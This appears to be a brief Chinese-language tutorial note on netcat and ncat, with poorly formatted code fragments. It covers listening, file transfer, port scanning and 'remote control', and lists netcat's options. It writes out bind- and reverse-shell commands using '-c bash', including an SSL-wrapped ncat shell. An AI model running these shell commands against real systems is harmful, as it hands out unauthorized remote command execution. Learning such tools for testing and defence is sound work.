netcat

NC缺乏加密和身份验证的能力

网络工具中的瑞士军刀。
有侦听模式和传输模式
传输文本信息,传输文件
可以远程控制
可以端口扫描

-lp port ``` 监听
1
```   nc -nv ip  port    -q  1
-nvz ip 1-65535 ``` 端口扫描
1
2
3
4
5


远控
正向 ``` nc -lp port -c bash ``` windows换为cmd
``` nc ip port

反向

lp port ```
1
``` nc ip port -c bash

Options:

  • -c shell commands
  • -e, –exec=PROGRAM program to exec after connect
  • -g, –gateway=LIST source-routing hop point[s], up to 8
  • -G, –pointer=NUM source-routing pointer: 4, 8, 12, …
  • -h, –help display this help and exit
  • -i, –interval=SECS delay interval for lines sent, ports scanned
  • -l, –listen listen mode, for inbound connects
  • -L, –tunnel=ADDRESS:PORT forward local port to remote address
  • -n, –dont-resolve numeric-only IP addresses, no DNS
  • -o, –output=FILE output hexdump traffic to FILE (implies -x)
  • -p, –local-port=NUM local port number
  • -r, –randomize randomize local and remote ports
  • -s, –source=ADDRESS local source address (ip or hostname)
  • -t, –tcp TCP mode (default)
  • -T, –telnet answer using TELNET negotiation
  • -u, –udp UDP mode
  • -v, –verbose verbose (use twice to be more verbose)
  • -V, –version output version information and exit
  • -x, –hexdump hexdump incoming and outgoing traffic
  • -w, –wait=SECS timeout for connects and final net reads
  • -z, –zero zero-I/O mode (used for scanning)

ncat 包含于nmap工具包中

ncat -c bash –allow ip -vnl port –ssl
ncat -nv ip port –ssl

文章目录
,